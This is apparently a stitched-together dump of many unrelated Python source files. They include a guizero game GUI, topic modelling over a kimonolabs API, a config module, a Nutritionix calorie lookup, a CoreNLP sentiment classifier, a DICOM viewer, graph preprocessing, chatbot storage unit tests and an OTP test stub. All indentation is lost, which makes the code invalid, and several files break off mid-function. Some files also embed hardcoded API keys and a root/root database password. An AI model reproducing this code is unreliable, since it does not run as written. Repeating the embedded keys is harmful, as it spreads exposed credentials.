box1=Box(window_registro,width="fill",height=40)
#Aquí guardar los datos del registro en la base de datos--------------------------------------------------------------
Registrarse=PushButton(window_registro,text="Registrarse",command=mostrar_login and window_registro.hide)
#Window_comprobacion
box=Box(window_comprobar,width="fill",height=20)
back=PushButton(box,text="❌",align="right")
texto=Text(window_comprobar,text="¿Seguro quiere finalizar el juego?",size=12,color="white")
box=Box(window_comprobar,width="fill",height=40)
box2=Box(window_comprobar,width="fill",height=120,layout="grid",grid=[1,0])
Espacio=Text(box2,text=" ",grid=[0,0],enabled="false")
Cancelar=PushButton(box2,text="𝘾𝙖𝙣𝙘𝙚𝙡𝙖𝙧",grid=[1,0],command=Continuar_Juego1)
Espacio=Text(box2,text=" ",grid=[2,0],enabled="false")
Aceptar=PushButton(box2,text="𝘼𝙘𝙚𝙥𝙩𝙖𝙧",grid=[3,0], command=GuardarPartida1)
#Window_comprobacion2
box=Box(window_comprobar2,width="fill",height=20)
back=PushButton(box,text="❌",align="right")
texto=Text(window_comprobar2,text="¿Seguro quiere finalizar el juego?",size=12,color="white")
box=Box(window_comprobar2,width="fill",height=40)
box2=Box(window_comprobar2,width="fill",height=120,layout="grid",grid=[1,0])
Espacio=Text(box2,text=" ",grid=[0,0],enabled="false")
#Cancelar=PushButton(box2,text="𝘾𝙖𝙣𝙘𝙚𝙡𝙖𝙧",grid=[1,0],command=Continuar_Juego2)
Espacio=Text(box2,text=" ",grid=[2,0],enabled="false")
#Aceptar=PushButton(box2,text="𝘼𝙘𝙚𝙥𝙩𝙖𝙧",grid=[3,0], command=GuardarPartida2)
app.display()
|
def merge_array(arr1, arr2):
return ' '.join(map(str, sorted(arr1+arr2,reverse=True)))
t = int(input())
for i in range(t):
N = input()
arr1 = list(map(int, input().split()))
arr2 = list(map(int, input().split()))
print(merge_array(arr1, arr2))
|
from menu.interface_menu import InterfaceMenu
class SupportMenu(InterfaceMenu):
def __init__(self, bot, user):
super().__init__(bot, user)
self.msgs.append(self.lang.SUPPORT_MSG)
def handle_message(self, message):
return super().handle_message(message) |
import json
import urllib
from collections import Counter
from pprint import pprint
import tsne
import plsa
import numpy as np
import sys
#import pylab
import math
kimpath = "http://www.kimonolabs.com/api/8fxfaiu6?apikey=fb110eb5d4c1775fbf3e9840e88f4f3a"
#kimpath = "http://www.kimonolabs.com/api/9d6lg708?apikey=5243944dc6c0c5602dd3f6f0ef19f2cf"
#kimpath = "http://www.kimonolabs.com/api/csy9c4ho?apikey=5243944dc6c0c5602dd3f6f0ef19f2cf"
query = sys.argv[1:]
#print query
query = "%20".join(query)
query = query.replace(' ','%20')
print query
param = "&query={}&querydisp={}".format(query,query)
print query,param
print kimpath+param
webapi = json.load(urllib.urlopen(kimpath+param))
#pprint(webapi["results"]["papers"][0]["title"]["text"])
#pprint(webapi["results"]["papers"][0]["keywordsAndAbstract"])
weblab = []
total_freq = Counter()
word_freq = {}
nD = len(webapi['results']['papers'])
for i in range(nD):
webitem = webapi['results']['papers'][i]
weblab += webapi['results']['papers'][i]['title']['text'],
webtext = webapi['results']['papers'][i]['keywordsAndAbstract'].split()
#print webtext
word_freq[i] = Counter(webtext)
total_freq.update(webtext)
#print word_freq[1]
#print total_freq
#print weblab
nW = len(total_freq)
wordID = {}
IDword = {}
for j in range(nW):
wordID[total_freq.keys()[j]] = j
IDword[j] = total_freq.keys()[j]
Ndw = np.zeros((nD,nW))
for i in range(nD):
for word in word_freq[i]:
Ndw[i][wordID[word]] = word_freq[i][word]
print Ndw
#pprint(total_freq)
#print Ndw
nZ = 3
noise = +np.random.rand(nD,nW)
Pd_z, Pw_z,Pz_d,Pz_w = plsa.plsa(Ndw+noise,nZ,100)
Y = np.concatenate((Pz_d.T,Pz_w.T))
Y = Y[:,:-1]
#for i in range(len(Y)):
# Y[i] = Y[i][:2]
#Y = Y[:2]
#print np.shape(Y)
#Y = tsne.tsne(Ndw.T,2,nD)
#Y = tsne.tsne(Y,2,nZ)
#Y = tsne.pca(Ndw.T,nD);
#Y = tsne.pca(Pw_z.T,nZ);
print np.shape(Y)
#print Y
#fig = pylab.figure()
#ax = fig.add_subplot(111)
#print weblab
#pylab.scatter(Y[nD:nD+nW,0], Y[nD:nD+nW,1], 20,color='blue');
#pylab.scatter(Y[0:nD,0] , Y[0:nD,1] , 20,color='red');
labels = wordID.keys()
#pylab.show()
dict_doc = {}
center_doc = {}
distance = 'distance'
children = 'children'
node_type = 'type'
node_name = 'name'
doc_type = 2
word_type = 1
# for i in range(nD):
# key_doc = webapi['results']['papers'][i]['title']['text']
# if i == 0:
# center_doc[node_name] = key_doc
# center_doc['x'] = Y[0,0]
# center_doc['y'] = Y[0,1]
# center_doc[node_type] = doc_type
# center_doc[children] = []
# for j in range(nW):
# if Ndw[i][j] != 0 :
# keyword_data = {}
# keyword_data['x'] = Y[j+nD,0]
# keyword_data['y'] = Y[j+nD,1]
# xDiff = center_doc['x']-Y[j+nD,0]
# yDiff = center_doc['y']-Y[j+nD,1]
# keyword_data[distance] = math.sqrt(xDiff*xDiff+yDiff*yDiff)
# keyword_data[node_name] = IDword[j]
# keyword_data[node_type] = word_type
# center_doc[children].append(keyword_data)
# else:
# doc_data = {}
# doc_data['x'] = Y[i,0]
# doc_data['y'] = Y[i,1]
# doc_data[node_name] = key_doc
# doc_data[node_type] = doc_type
# doc_data[children] = []
# xDiff = center_doc['x']-Y[i,0]
# yDiff = center_doc['y']-Y[i,1]
# doc_data[distance] = math.sqrt(xDiff*xDiff + yDiff*yDiff)
# for j in range(nW):
# if Ndw[i][j] != 0 :
# keyword_data = {}
# keyword_data['x'] = Y[j+nD,0]
# keyword_data['y'] = Y[j+nD,1]
# xDiff = Y[i,0] - Y[j+nD,0]
# yDiff = Y[i,1] - Y[j+nD,1]
# keyword_data[distance] = math.sqrt(xDiff*xDiff + yDiff*yDiff)
# keyword_data[node_name] = IDword[j]
# keyword_data[node_type] = word_type
# doc_data[children].append(keyword_data)
# center_doc[children].append(doc_data)
# with open('json_all.txt', 'wb') as outfile:
# json.dump(center_doc, outfile,ensure_ascii=False)
# print center_doc
|
import os
import os.path
from codebuilder.utils import util
CONFIG_DIR = os.environ.get('CONFIG_DIR', '/etc/codebuilder')
CONFIG_FILES = []
LOG_LEVEL = 'debug'
LOG_DIR = '/var/log/codebuilder'
LOG_FILE = None
LOG_INTERVAL = 6
LOG_INTERVAL_UNIT = 'h'
LOG_FORMAT = (
'%(asctime)s - %(filename)s - %(lineno)d - %(levelname)s - %(message)s')
LOG_BACKUPS = 5
LOG_FILTERS = []
DATABASE_TYPE = 'mysql'
DATABASE_NAME = 'codebuilder'
DATABASE_USER = 'root'
DATABASE_PASSWORD = 'root'
DATABASE_HOST = 'localhost'
DATABASE_PORT = 3306
DATABASE_URI = util.LazyObj(
lambda: '%s://%s:%s@%s:%s/%s' % (
util.parse(DATABASE_TYPE),
util.parse(DATABASE_USER),
util.parse(DATABASE_PASSWORD),
util.parse(DATABASE_HOST),
util.parse(DATABASE_PORT),
util.parse(DATABASE_NAME)
)
)
DATABASE_POOL_TYPE = 'instant'
config = util.load_configs([
os.path.join(CONFIG_DIR, filename) for filename in CONFIG_FILES
])
CONFIG_VARS = vars()
for key, value in config.iteritems():
CONFIG_VARS[key] = value
LOG_LEVEL = util.Argument('--loglevel', dest='loglevel', default=LOG_LEVEL)
LOG_DIR = util.Argument('--logdir', dest='logdir', default=LOG_DIR)
LOG_FILE = util.Argument('--logfile', dest='logfile', default=LOG_FILE)
LOG_INTERVAL = util.Argument(
'--log-interval', dest='log_interval', type=int, default=LOG_INTERVAL
)
LOG_INTERVAL_UNIT = util.Argument(
'--log-interval_unit', dest='log_interval_unit',
choices=['h', 'm', 'd'], default=LOG_INTERVAL_UNIT
)
LOG_FORMAT = util.Argument(
'--log-format', dest='log_format', default=LOG_FORMAT
)
LOG_BACKUPS = util.Argument(
'--log-backups', dest='log_backups', type=int, default=LOG_BACKUPS
)
LOG_FILTERS = util.Argument(
'--log-filters', dest='log_filters', nargs='*', default=LOG_FILTERS
)
DATABASE_TYPE = util.Argument(
'--database-type', dest='database_type', default=DATABASE_TYPE
)
DATABASE_NAME = util.Argument(
'--database-name', dest='database_name', default=DATABASE_NAME
)
DATABASE_USER = util.Argument(
'--database-user', dest='database_user', default=DATABASE_USER
)
DATABASE_PASSWORD = util.Argument(
'--database-password', dest='database_password', default=DATABASE_PASSWORD
)
DATABASE_HOST = util.Argument(
'--database-host', dest='database_host', default=DATABASE_HOST
)
DATABSE_PORT = util.Argument(
'--database-port', dest='database_port', type=int, default=DATABASE_PORT
)
DATABASE_URI = util.Argument(
'--database-uri', dest='database_uri', default=DATABASE_URI
)
def init_config():
global CONFIG_VARS
for key, value in CONFIG_VARS.items():
if isinstance(value, util.ConfigAttr):
CONFIG_VARS[key] = util.parse(value)
|
from nutritionix import Nutritionix
from logos import getlogo
# Application ID:
appid = 'ffb27ccd'
# API Key:
apikey = '516561556bb62da642a4824b86084d02'
nix = Nutritionix(app_id=appid, api_key=apikey)
def search_calls(searchTerm):
itemID=None
pizza2 = nix.search(searchTerm) # , results="0:1")
json = pizza2.json()
for dics in json['hits']:
if searchTerm in dics['fields']['item_name']:
itemID = dics['fields']['item_id']
break
if not bool(itemID):
itemID = str(json['hits'][0]['fields']['item_id'])
itemJSON = nix.item(id=itemID).json()
calories = itemJSON['nf_calories']
grams = itemJSON['nf_serving_weight_grams']
serving_quant = itemJSON['nf_serving_size_qty']
serving_units = itemJSON['nf_serving_size_unit']
serving = str(serving_quant) + " " + serving_units
calories_per_serving = str(calories) + " calories per " + serving
return searchTerm, calories_per_serving, calories, serving_units
if __name__ == '__main__':
file_name = "cheetos.png"
output=str(getlogo(file_name)) |
import numpy as np
from nltk import sent_tokenize
import json, requests
# java -mx4g -cp "*" edu.stanford.nlp.pipeline.StanfordCoreNLPServer -port 9000 -timeout 15000000
class StanfordCoreNLP:
"""
Modified from https://github.com/smilli/py-corenlp
"""
def __init__(self, server_url):
# TODO: Error handling? More checking on the url?
if server_url[-1] == '/':
server_url = server_url[:-1]
self.server_url = server_url
def annotate(self, text, properties=None):
assert isinstance(text, str)
if properties is None:
properties = {}
else:
assert isinstance(properties, dict)
# Checks that the Stanford CoreNLP server is started.
try:
requests.get(self.server_url)
except requests.exceptions.ConnectionError:
raise Exception('Check whether you have started the CoreNLP server e.g.\n'
'$ cd <path_to_core_nlp_folder>/stanford-corenlp-full-2016-10-31/ \n'
'$ java -mx4g -cp "*" edu.stanford.nlp.pipeline.StanfordCoreNLPServer -port <port> -timeout <timeout_in_ms>')
data = text.encode()
r = requests.post(
self.server_url, params={
'properties': str(properties)
}, data=data, headers={'Connection': 'close'})
output = r.text
if ('outputFormat' in properties
and properties['outputFormat'] == 'json'):
try:
output = json.loads(output, encoding='utf-8', strict=True)
except:
pass
return output
class sentiment_classifier() :
def __init__ (self,text) :
self.text = text
def sentiment_analysis_on_sentence(self,sentence):
# The StanfordCoreNLP server is running on http://127.0.0.1:9000
nlp = StanfordCoreNLP('http://127.0.0.1:9000')
# Json response of all the annotations
output = nlp.annotate(sentence, properties={
"annotators": "tokenize,ssplit,parse,sentiment",
"outputFormat": "json",
# Setting enforceRequirements to skip some annotators and make the process faster
"enforceRequirements": "false"
})
# In JSON, 'sentences' is a list of Dictionaries, the second number is basically the index of the sentence you want the result of, and each sentence has a 'sentiment' attribute and 'sentimentValue' attribute
# "Very negative" = 0 "Negative" = 1 "Neutral" = 2 "Positive" = 3 "Very positive" = 4 (Corresponding value of sentiment and sentiment value)
assert isinstance(output['sentences'], list)
return output['sentences']
def sentence_sentiment(self,sentence):
# checking if the sentence is of type string
assert isinstance(sentence, str)
# getting the json ouput of the different sentences. Type "List"
result = self.sentiment_analysis_on_sentence(sentence)
num_of_sentences = len(result)
sentiment_vec = np.zeros((1,num_of_sentences), dtype = "int64" )
for i in range(0,num_of_sentences):
sentiment_vec[0,i] = ( int(result[i]['sentimentValue']) )
#print(sentiment_vec[0])
return sentiment_vec
def paragraph_sentiment(self,text):
sents = sent_tokenize(self.text)
final_vector = []
for sent in sents :
vec = self.sentence_sentiment(sent)
modified_vec = vec[0]
if len(modified_vec) > 1 :
average = 0
for value in modified_vec :
average += value
average = average/len(modified_vec)
final_vector.append(average)
else :
final_vector.append(modified_vec[0])
return final_vector
def display_value_meanings(self):
setiment_meaning = {'0':'Very Negative','1': 'Negative','2':'Normal','3':'Good','4':'Very Good'}
for i in range(len(setiment_meaning)):
print("{} stands for {}".format(str(i),setiment_meaning[str(i)]))
if __name__ == '__main__':
text = "You are stupid! You're smart and handsome. This is a tool. Rohan is a fantastic person and a great person!"
text = "I think she makes some good points, and I think some things are just put out there and that she doesn't listen. She just wants only her opinion to be right to an extreme. She's good at analyzing situations, but she would not be good for a government position requiring much trust to keep stability, that is for sure. On the other hand, you probably want her to be your Republican lobbyist. A \"friend\" a \"Coulter Jr.\" told me about how great this book is. He acts just like Coulter, but just doesn't publish books and goes out and speaks like she does. Otherwise, he would probably be doing at least okay- (Coulter created and kept her niche first.) I am not particularly Democrat or Republican, but I try to give everything a chance. This book, while giving some fresh perspectives I would not have thought of, is quite hit or miss, too opinionated, and not always reasoning things out enough."
senti = sentiment_classifier(text)
senti.display_value_meanings()
vector = senti.paragraph_sentiment(text)
print(vector) |
import sys
import dicomsdl as dicom
def show(args):
if len(args) == 1:
dcmfn = args[0]
idx = 0
elif len(args) > 1:
dcmfn = args[0]
idx = int(args[1])
dset = dicom.open_file(dcmfn)
info = dset.getPixelDataInfo()
if idx >= info['NumberOfFrames']:
print('File have %d frames.'%(info['NumberOfFrames']))
return
dset.to_pil_image(idx).show()
def main():
show(sys.argv[1:])
if __name__ == "__main__":
main() |
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 13 19:47:44 2017
@author: cm
"""
import os
import numpy as np
import pandas as pd
from hyperparameters import Hyperparamters as hp
import string
pwd = os.path.dirname(os.path.abspath('__file__'))
#print(pwd)
def load_vocabulary():
word_dic = pd.read_csv('./dict/word_dict.txt', sep='\t', header=None)
word = list(word_dic[0])
return word
vocabulary = load_vocabulary()
def engWordOfSentence(sentence):
letters = string.ascii_letters
L = []
length = len(sentence)
engWord = ''
i = 0
while i < length:
if sentence[i] in letters:
engWord += sentence[i]
if (i+1<length and sentence[i+1] not in letters) or i+1==length:
L.append(engWord.capitalize())
engWord = ''
else:
L.append(sentence[i])
i += 1
return L
def build_word_id(sentence):
# L = [l for l in sentence] # 需要修改成将 英文单词 部分当做一个整体
L = engWordOfSentence(sentence)
Id = []
eos_index = vocabulary.index('<EOS>')
unknow_index = vocabulary.index('unknow')
for l in L:
try:
vocabulary.index(l)
Id.append(vocabulary.index(l))
except:
Id.append(unknow_index)
if len(Id) >= hp.num_steps:
Id = Id[0:hp.num_steps]
else:
Id.extend([eos_index] * (hp.num_steps - len(Id)))
return np.array(Id)
def build_id(sent):
LS = sent.split()
words_id = []
labels_id = []
for i,L in enumerate(LS):
ls = L.split('/')
if len(ls)==2:
word = ls[0]
label = ls[1]
word_list = [w for w in word]
for w in word_list:
try:
vocabulary.index(w)
words_id.append(vocabulary.index(w))
if label == 'ns' or label == 'nsf':
if word_list.index(w) == 0:
labels_id.append(1) # B 1
else:
labels_id.append(2) # I 2
else:
labels_id.append(0) # O 0
except:
words_id = words_id
labels_id = labels_id
else:
continue
return words_id,labels_id
def build_id_n(sentences):
w_ids = []
l_ids = []
for i in range(len(sentences)):
w_id,l_id = build_id(sentences[i])
if len(l_id) >= hp.num_steps:
w_ids.append(w_id[0:hp.num_steps])
l_ids.append(l_id[0:hp.num_steps])
elif len(l_id) < hp.num_steps:
l = len(l_id)
w_id.extend([0]*(hp.num_steps-l))
w_ids.append(w_id)
l_id.extend([0]*(hp.num_steps-l))
l_ids.append(l_id)
return np.array(w_ids),np.array(l_ids)
if __name__ == '__main__':
text = '我爱/n 中国/ns 人/l aa/d'
text = '[武汉市/ns 江夏区/ns]/nz'
build_id(text)
a,b = build_id_n(['我爱/n 中国/ns ','我爱/n 武汉/ns'])
a,b = build_id_n([text])
print(a)
|
"""
Runs reduction rules to generate data/preprocessed/ from data/sanitized/
"""
import networkx as nx
from pathlib import Path
import time
import datetime
from src.preprocessing.graphs import (
read_edgelist,
write_edgelist,
write_huffner,
write_snap,
open_path,
reset_labels,
names_in_dir
)
from src.preprocessing.oct import oct_reductions
from src.preprocessing.vc import vc_reductions
def _create_preprocessing_dirs():
"""
Creates the directories needed for preprocessed data.
"""
preprocessed_dir = Path('.') / 'data' / 'preprocessed'
# Make directories if they do not exist
Path(preprocessed_dir / 'summary').mkdir(parents=True, exist_ok=True)
Path(preprocessed_dir / 'oct').mkdir(parents=True, exist_ok=True)
Path(preprocessed_dir / 'lookup').mkdir(parents=True, exist_ok=True)
Path(preprocessed_dir / 'edgelist').mkdir(parents=True, exist_ok=True)
Path(preprocessed_dir / 'huffner').mkdir(parents=True, exist_ok=True)
Path(preprocessed_dir / 'snap').mkdir(parents=True, exist_ok=True)
def _write_summary_header(csv_filename):
with open_path(csv_filename, 'w') as outfile:
outfile.write('{},{},{},{},{},{},{},{},{}\n'.format(
'Dataset',
'original_vertices',
'original_edges',
'vertices_removed',
'edges_removed',
'oct',
'bipartite',
'final_vertices',
'final_edges'))
def _write_summary(graph, output_dir, csv_filename):
"""
Append a summary line to a csv file.
"""
with open_path(output_dir / csv_filename, 'a') as outfile:
outfile.write('{},{},{},{},{},{},{},{},{}\n'.format(
graph.graph['name'],
graph.graph['original_vertices'],
graph.graph['original_edges'],
graph.graph['vertices_removed'],
graph.graph['edges_removed'],
graph.graph['oct'],
graph.graph['bipartite'],
graph.order(),
graph.size()))
def _write_oct_set(graph, oct_set, output_dir):
"""
Write the oct vertices that were preprocessed out of the original graph.
"""
name = '{}.oct'.format(graph.graph['name'])
with open_path(output_dir / name, 'w') as outfile:
for vertex in oct_set:
outfile.write('{}\n'.format(vertex))
def _write_name_lookup(graph, output_dir):
"""
Write a lookup table of preprocessed vertices to original names.
Each line is [new_name] [original_name].
"""
name = '{}.lookup'.format(graph.graph['name'])
og_name_lookup = nx.get_node_attributes(graph, 'og_name')
# print("Nodes:", graph.nodes(data=True))
# print("Lookup:", og_name_lookup)
with open_path(output_dir / name, 'w') as outfile:
for vertex in graph.nodes():
outfile.write('{} {}\n'.format(vertex, og_name_lookup[vertex]))
def _convert_synthetic(data_names):
# Define some directories-of-interest paths
input_dir = Path('.') / 'data' / 'sanitized'
output_dir = Path('.') / 'data' / 'preprocessed'
# Remove the old statistics CSV
summary_dir = Path(output_dir / 'summary')
summary_filename = summary_dir / 'synthetic.csv'
if summary_filename.is_file():
Path(summary_filename).unlink()
else:
summary_dir.mkdir(exist_ok=True, parents=True)
_write_summary_header(summary_filename)
# Convert datasets
for dataset in data_names:
timestamp = datetime.\
datetime.\
fromtimestamp(time.time()).strftime('%Y/%m/%d-%H:%M:%S:')
print('{} Processing {}'.format(timestamp, dataset))
# Process the graph
graph = read_edgelist(input_dir / 'edgelist', dataset)
graph = reset_labels(graph)
graph.graph['original_vertices'] = graph.order()
graph.graph['original_edges'] = graph.size()
oct_set = set()
graph_reduced = True
while graph_reduced:
# Require a change for graph_reduced to be triggered again
graph_reduced = False
# Compute OCT reductions
print("- Computing OCT reduction")
graph = reset_labels(graph)
changed, graph, oct_set = oct_reductions(graph, oct_set)
if changed:
print("-- OCT reduced graph")
graph_reduced = True
# Compute
print("- Computing VC reduction")
graph = reset_labels(graph)
write_snap(graph, output_dir / 'snap')
changed, graph, oct_set = vc_reductions(graph, oct_set)
if changed:
print("-- VC reduced graph")
graph_reduced = True
# Write the results
graph = reset_labels(graph)
_write_summary(graph, output_dir / 'summary', 'synthetic.csv')
_write_oct_set(graph, oct_set, output_dir / 'oct')
_write_name_lookup(graph, output_dir / 'lookup')
write_edgelist(graph, output_dir / 'edgelist')
write_huffner(graph, output_dir / 'huffner')
write_snap(graph, output_dir / 'snap')
print('Finished preprocessing synthetic data')
if __name__ == '__main__':
"""
Runs preprocessing on all synthetic graphs.
"""
# Compute the synthetic graph names and preprocess
_create_preprocessing_dirs()
input_dir = Path('.') / 'data' / 'sanitized' / 'edgelist'
datasets = names_in_dir(input_dir, '.edgelist')
# Quantum data has no dashes, synthetics use dashes to separate parameters
datasets = sorted(list(filter(lambda x: '-' in x, datasets)))
# Add the extension back to the dataset name
datasets = [x + '.edgelist' for x in datasets]
print('Preprocessing {} datasets'.format(len(datasets)))
_convert_synthetic(datasets)
|
import dbInfo as di
import tfIdfCalc as idf
import numpy as np
def getActorTagMatrix():
tagIds = di.getAllTags()
tagLen = len(tagIds)
actorNames = di.getAllActorNames()
actorlist = di.getAllActors()
actorTags = np.zeros((len(actorlist),tagLen))
i=0
idfActVector = idf.idfActorTag()
for actor in actorlist:
actVect = idf.tfIdfActorTag(actor[0], idfActVector)
for j in range(tagLen):
if(tagIds[j][0] in actVect.keys()):
actorTags[i][j]=actVect[tagIds[j][0]]
i += 1
return actorTags
def getCoactorMatrix():
actorList = di.getAllActors()
actLen = len(actorList)
sim = np.zeros((actLen,actLen))
actMovies = [0 for i in range(actLen)]
for i in range(actLen):
actMovies[i] = di.getActorMovieIds(actorList[i][0])
for i in range(actLen):
for j in range(actLen):
set1 = set(actMovies[i])
set2 = set(actMovies[j])
sim[i][j]=len(set1&set2)
return sim |
import unittest
from programy.storage.stores.nosql.mongo.dao.property import DefaultVariable
from programy.storage.stores.nosql.mongo.dao.property import Property
from programy.storage.stores.nosql.mongo.dao.property import Regex
class PropertyTests(unittest.TestCase):
def test_init_no_id(self):
property = Property(name='name', value='value')
self.assertIsNotNone(property)
self.assertIsNone(property.id)
self.assertEqual('name', property.name)
self.assertEqual('value', property.value)
self.assertEqual({'value': 'value', 'name': 'name'}, property.to_document())
def test_init_with_id(self):
property = Property(name='name', value='value')
property.id = '666'
self.assertIsNotNone(property)
self.assertIsNotNone(property.id)
self.assertEqual('666', property.id)
self.assertEqual('name', property.name)
self.assertEqual('value', property.value)
self.assertEqual({'_id': '666', 'value': 'value', 'name': 'name'}, property.to_document())
def test_from_document_no_id(self):
property1 = Property.from_document({'value': 'value', 'name': 'name'})
self.assertIsNotNone(property1)
self.assertIsNone(property1.id)
self.assertEqual('name', property1.name)
self.assertEqual('value', property1.value)
def test_from_document_with_id(self):
property2 = Property.from_document({'_id': '666', 'value': 'value', 'name': 'name'})
self.assertIsNotNone(property2)
self.assertIsNotNone(property2.id)
self.assertEqual('666', property2.id)
self.assertEqual('666', property2.id)
self.assertEqual('name', property2.name)
self.assertEqual('value', property2.value)
def test_repr_no_id(self):
property1 = Property.from_document({'value': 'value', 'name': 'name'})
self.assertEquals("<Property(id='n/a', name='name', value='value')>", str(property1))
def test_repr_with_id(self):
property2 = Property.from_document({'_id': '666', 'value': 'value', 'name': 'name'})
self.assertEquals("<Property(id='666', name='name', value='value')>", str(property2))
class DefaultVariableTests(unittest.TestCase):
def test_init_no_id(self):
property = DefaultVariable(name='name', value='value')
self.assertIsNotNone(property)
self.assertIsNone(property.id)
self.assertEqual('name', property.name)
self.assertEqual('value', property.value)
self.assertEqual({'value': 'value', 'name': 'name'}, property.to_document())
def test_init_with_id(self):
property = DefaultVariable(name='name', value='value')
property.id = '666'
self.assertIsNotNone(property)
self.assertIsNotNone(property.id)
self.assertEqual('666', property.id)
self.assertEqual('name', property.name)
self.assertEqual('value', property.value)
self.assertEqual({'_id': '666', 'value': 'value', 'name': 'name'}, property.to_document())
def test_from_document_no_id(self):
property1 = DefaultVariable.from_document({'value': 'value', 'name': 'name'})
self.assertIsNotNone(property1)
self.assertIsNone(property1.id)
self.assertEqual('name', property1.name)
self.assertEqual('value', property1.value)
def test_from_document_with_id(self):
property2 = DefaultVariable.from_document({'_id': '666', 'value': 'value', 'name': 'name'})
self.assertIsNotNone(property2)
self.assertIsNotNone(property2.id)
self.assertEqual('666', property2.id)
self.assertEqual('name', property2.name)
self.assertEqual('value', property2.value)
def test_repr_no_id(self):
property1 = DefaultVariable.from_document({'value': 'value', 'name': 'name'})
self.assertEqual("<DefaultVariable(id='n/a', name='name', value='value')>", str(property1))
def test_repr_with_id(self):
property2 = DefaultVariable.from_document({'_id': '666', 'value': 'value', 'name': 'name'})
self.assertEqual("<DefaultVariable(id='666', name='name', value='value')>", str(property2))
class RegexTests(unittest.TestCase):
def test_init_no_id(self):
property = Regex(name='name', value='value')
self.assertIsNotNone(property)
self.assertIsNone(property.id)
self.assertEqual('name', property.name)
self.assertEqual('value', property.value)
self.assertEqual({'value': 'value', 'name': 'name'}, property.to_document())
def test_init_with_id(self):
property = Regex(name='name', value='value')
property.id = '666'
self.assertIsNotNone(property)
self.assertIsNotNone(property.id)
self.assertEqual('666', property.id)
self.assertEqual('name', property.name)
self.assertEqual('value', property.value)
self.assertEqual({'_id': '666', 'value': 'value', 'name': 'name'}, property.to_document())
def test_from_document_no_id(self):
property1 = Regex.from_document({'value': 'value', 'name': 'name'})
self.assertIsNotNone(property1)
self.assertIsNone(property1.id)
self.assertEqual('name', property1.name)
self.assertEqual('value', property1.value)
def test_from_document_with_id(self):
property2 = Regex.from_document({'_id': '666', 'value': 'value', 'name': 'name'})
self.assertIsNotNone(property2)
self.assertIsNotNone(property2.id)
self.assertEqual('666', property2.id)
self.assertEqual('name', property2.name)
self.assertEqual('value', property2.value)
def test_repr_no_id(self):
property1 = Regex.from_document({'value': 'value', 'name': 'name'})
self.assertEquals("<Regex(id='n/a', name='name', value='value')>", str(property1))
def test_repr_with_id(self):
property2 = Regex.from_document({'_id': '666', 'value': 'value', 'name': 'name'})
self.assertEquals("<Regex(id='666', name='name', value='value')>", str(property2))
|
# -*- coding: utf-8 -*-
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from pandas import DataFrame
import pandas as pd
from sklearn.datasets import load_iris
from sklearn.decomposition import PCA
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from sklearn.metrics import accuracy_score
# 调入数据
iris = load_iris()
# sklearn对数据集的介绍
# print(iris.DESCR)
# 提取数据内容
iris_data = iris.data
feature_names = iris.feature_names
iris_target = iris.target
# 格式整理
iris_target.shape = (150,1)
iris_all = np.hstack((iris_data, iris_target))
# 转化DataFrame
iris_data_df = DataFrame(iris_data,columns=feature_names)
iris_target_df = DataFrame(iris_target,columns=['target'])
iris_data_all_df = DataFrame(iris_all,columns=feature_names+['target'])
# 数据预览
# print("默认前5行")
# print(iris_data_all_df.head(2)) #默认前5行
# print("默认后5行")
# print(iris_data_all_df.tail(2)) #默认后5行
# print("随机抽取")
# print(iris_data_all_df.sample(2)) #随机抽取
# print("大小")
# print(iris_data_all_df.shape)
# print("类型")
# print(iris_data_all_df.dtypes)
# print("多种信息")
# print(iris_data_all_df.info())
# 统计描述
# print(iris_data_all_df.describe()) #常见 统计量的描述
# 数据范围
# sns.boxplot(data=iris_data_all_df)
# plt.show()
# 总览
# plt.plot(iris_data_df)
# plt.legend(feature_names)
# plt.show()
# 提取部分数据 (提取花萼数据 做图)
# 为了便于观察做出部分数据图
# sepal
sepal_data_df = iris_data_df[['sepal length (cm)','sepal width (cm)']]
plt.plot(sepal_data_df)
plt.legend(['sepal length (cm)','sepal width (cm)'])
plt.title('sepal data')
# plt.show()
sns.pairplot(iris_data_all_df, vars=iris_data_all_df.columns[:4], hue='target', size=3, kind='reg')
plt.show()
|
import numpy as np
import pandas as pd
from Sliding import *
from os import path
import os
from os import listdir
from os.path import isfile, join
def main(subject_directory):
path = get_path(subject_directory)
print path
label_matrix = load_file_as_matrix(path)
# What label occurs before
before_label = 18 #Bending down
criteria_label = 11 #Picking
after_label = 10 #Bending up
df_label = relabel_matrix(label_matrix, before_label, criteria_label, after_label)
df_label.to_csv(path, header=None, index=False)
def relabel_matrix(matrix, before_label, criteria_label, after_label):
change_boolean = False
for i in range(1, len(matrix)):
# if the previous was the shifting activity and this is the activity to be changed
if matrix[i-1] == criteria_label and matrix[i] == before_label:
change_boolean = True
#print i, change_boolean
# If the previous activity have been changed and this is not an activity to be changed
if matrix[i-1] == after_label and matrix[i] != before_label:
change_boolean = False
#print i, change_boolean
# Change the label
if change_boolean:
matrix[i] = [after_label]
return pd.DataFrame(matrix)
def load_file_as_matrix(path):
return pd.read_csv(path, header=None, sep='\,').as_matrix()
def get_path(subject_directory):
signal_folder = "/RAW_SIGNALS/"
# Get parent dir
dirname=os.path.dirname
p = os.path.join(dirname(dirname(__file__)), 'data/'+subject_directory)
# Files in current directory
files_in_dir = [ f for f in listdir(p + signal_folder) if isfile(join(p+ signal_folder,f)) ]
for f in files_in_dir:
if "LAB" in f:
file = f
path = p + signal_folder + file
return path
if __name__ == "__main__":
main("01A") |
def prediction_model(pclass, sex,age,sibsp,parch,fare,embarked,title):
import pickle
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
file_dir = os.path.join(BASE_DIR, 'titanic_model.sav')
x= [[pclass,sex,age,sibsp,parch,fare,embarked,title]]
randomforest = pickle.load(open(file_dir, 'rb'))
|
# otp_test.py - Unit tests for the OTP1 and OTP2.
#
# NOTE test1() requires a physical YubiKey with a specific configuration.
import otp
import sys
import yubico
from Crypto.Cipher import AES
from Crypto.Hash import HMAC, SHA, SHA256
from yubico.yubico_util import crc16
test_key = '\x00' * 32
test_id = 'fellas'
test_enciphered_frame = '791d7888f464196075998d924c5db007'.decode('hex')
test_tweak = 'tweak'
test_payload = 'hype' * 3
def test1():
'''Tests the OTP1 protocol.
Requires a YubiKey with OTP challenge-response configured in slot 2. The key
should be a 16-byte, all-zero string.
'''
bc = AES.new(test_key[:16])
# Fake previous frame (for testing).
last_frame = otp.Frame(bc.block_size)
# Test OTP validation.
